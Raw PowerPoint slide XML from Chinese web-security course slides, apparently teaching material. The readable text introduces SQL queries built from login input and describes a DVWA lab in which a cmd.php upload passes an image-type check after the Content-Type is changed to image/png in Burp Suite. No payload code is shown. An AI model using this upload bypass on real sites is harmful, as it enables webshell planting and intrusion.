            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>洞</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="151130" marR="33020" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>应用程序的登录模块，程序需要获取前端所输入的账号和密</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>码</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，拼</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>接</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>QL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句在 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>数据库中进行查询，登录查询代码如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>下</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="958227" y="1779904"/>
            <a:ext cx="3237737" cy="864869"/>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352943" y="2088515"/>
            <a:ext cx="1871980" cy="552450"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1871980" h="552450">
                <a:moveTo>
                  <a:pt x="0" y="552450"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1871472" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1871472" y="552450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="552450"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>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979" y="3096610"/>
            <a:ext cx="208279"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10</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880276"/>
            <a:ext cx="3403600" cy="546735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="15240" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="825"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="12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3</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>上传</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>cmd.php</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>文件时</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>使</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Brup</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>拦截查看该文件的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>MIME</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="5080">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Multipurpose</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Mail Extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>多用途互联网邮件扩展类</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>），可以发 现</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>文件的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>MIME</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>类型为</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>application/octet-stream</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>如图所示，而上传文件时 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>系统会判断文件类型是否为</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>im</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>age/jpe</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，显</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>然</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>cmd.ph</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>文件无法通过</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>WA </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的验</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>证</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2057279" y="2721264"/>
            <a:ext cx="93599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查看</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>文件的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>MIME</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>类型</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1315605" y="1398143"/>
            <a:ext cx="2273807" cy="1296161"/>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320177" y="1402715"/>
            <a:ext cx="2265045" cy="1287145"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2265045" h="1287145">
                <a:moveTo>
                  <a:pt x="0" y="1287018"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2264663" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2264663" y="1287018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1287018"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>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3436620" cy="135255"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="15240" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="12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4</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>将上图所</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>示</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>请求中</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>更改为</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>image/png</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>类型，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>图所示。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2809627" y="3170971"/>
            <a:ext cx="556895"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修改</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>MIME</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>类型</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1821827" y="1579626"/>
            <a:ext cx="2281427" cy="1546097"/>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825637" y="1584960"/>
            <a:ext cx="2275840" cy="1537335"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2275840" h="1537335">
                <a:moveTo>
                  <a:pt x="0" y="1536954"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2275332" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2275332" y="1536953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1536954"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>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715397" y="1373417"/>
            <a:ext cx="3404235" cy="238125"/>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5</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）将修改后的</a:t>
            </a:r>
